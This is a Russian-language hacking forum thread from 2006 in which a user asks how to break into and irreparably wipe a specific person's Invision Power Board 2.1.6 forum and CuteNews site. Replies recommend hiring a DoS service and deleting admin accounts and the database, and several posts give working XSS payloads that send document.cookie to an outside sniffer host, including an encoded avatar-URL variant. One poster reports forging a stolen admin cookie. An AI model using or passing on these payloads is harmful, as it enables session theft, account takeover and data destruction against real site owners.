Форумы Уязвимости invision board версии 2.1.6?

Discussion in 'Уязвимости CMS/форумов' started by XMaster, 27 May 2006.

  1. XMaster

    XMaster New Member

    Joined:
    21 Dec 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Превед народ!!!
    Я здесь новичек, так что сори за может быть глупый вопрос ...
    Мне надо проучить кое-кого, но у него %:!"; стоит форум IPB 2.1.6
    Я здесь перекопал темы но не нашел ничего по этой версии ... может что-то из 2.1.5 сгодиться?
    У меня ведь модем пока что-то скачаешь умрешь ... а если не знаешь что работает а что нет ... подскажите ...
    еще там форум русский, а я только инглишь нашел ... а где руссификацию найти?
    помогите! мне б че нить попроще, типа xss ... и што б затереть фесь форум что б не восстановить было!


    А еще сразу уж спрошу про CuteNews ... у него она стоит. т.к. в коде можно эту строчку найти.
    Но прикол в том что он кажись переименовал или переместил дефолтную страницу входа (где лог и пароль вводишь) в панель управления.
    Я уже все перекопал, в поисковиках существующие страницы сайта смотрел, и через статистику маил.ру, так и не нашел где пароль вводить что б в панель попасть ...
    При том что новости не только он :*!":*;!"; админ пишет, но и другие юзеры!!! А на сайте автаризации вообще нету ... или скорее я ее не нашел ...
    народ подскажите! Как быть ... как найти куда пароль писать ... как убить заодно кутеневс эти гакие!
     
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Помойму самое простое решение устроить дос форуму. Поищи людей у которых есть дос-сервис. И пипец форуму.
     
  3. Mezya!

    Mezya! Banned

    Joined:
    27 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    для этой версии багов вроде бы не найдено пока...насколько я знаю...
     
  4. Dmitriy507

    Dmitriy507 Elder - Старейшина

    Joined:
    29 Apr 2006
    Messages:
    135
    Likes Received:
    19
    Reputations:
    6
    xss от пятой должен подойти. поройся в античате здесь уже есть 2 темы об этом.
     
  5. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Ну восстановить форум то можно всегда. Если бэкапы базы регулярные.
    А так XSS через аватару должна работать.
    http://forum.antichat.ru/threadnav17358-5-10.html
     
  6. nytros

    nytros New Member

    Joined:
    5 Jan 2006
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0

    Я не очень соглосен на счот Backup-a.Стиру админские акаунтъй и потом базу.
     
  7. koi8-r

    koi8-r Banned

    Joined:
    2 Mar 2006
    Messages:
    56
    Likes Received:
    3
    Reputations:
    -7
  8. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Ну...
    Бэк ап можно и на другие диски сделать. Хотя на некоторое время форум точно ляжет.
     
    1 person likes this.
  9. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    А на счет жалобы? тут видео было. или оно только до 1.2.4?
     
  10. kostet

    kostet New Member

    Joined:
    18 Jan 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ребят Ipb мне при запросе алерт кинул! ато нормально?
    короче я залез на форум, и зделал запрос javascript:alert('lamo'). если это можно использовать скажите мне что я умный :) если нет то ниче не говорите
    P.S.
    я тока начинаю
     
    #10 kostet, 30 May 2006
    Last edited: 30 May 2006
  11. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Возможно можно стырить куки.
    Уж это то тут точно есть.
    Просто всесто алерта надо отсылку на сниффер вписать.
    Попробуй например:
    Code:
    <script>
    img = new Image();
    img.src = "http://адресс_снифера?"+document.cookie;
    </script>
     
  12. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    че за бред !!!!!!! пишу :
    javascript:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif
    мне говорит :
    Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!!
    версия форума - v2.1.6
    пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!
     
  13. nytros

    nytros New Member

    Joined:
    5 Jan 2006
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Для 2.1.4 есть другая уязвимость на форум античата.Поисчи и попробуй на 2.1.6..
     
  14. bab3pack

    bab3pack New Member

    Joined:
    1 Jun 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Через аватар реально работает
    Но стырил куки, подделал, зашел как админ, ..... что дальше?
     
    #14 bab3pack, 3 Jun 2006
    Last edited: 3 Jun 2006
  15. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    А ничего :(
    Соль не даст расшифровать.
    Кстати...
    Подмена странички работает через аватару?
    По идее должна. Не проверял.
     
  16. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються!
     
  17. bab3pack

    bab3pack New Member

    Joined:
    1 Jun 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть?

    Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д. :confused:
     
    #17 bab3pack, 4 Jun 2006
    Last edited: 4 Jun 2006
  18. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Думаю да.
    Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
    Зависит от настроек форума.
     
  19. kulhacker

    kulhacker New Member

    Joined:
    3 May 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
    Если ацкий админ выключил в админке эту возможность?
     
  20. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
    Зайди сюда:http://www.securityfocus.com/vulnerabilities
    найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.

    Надеюсь я тебе помог.
    dracula4ever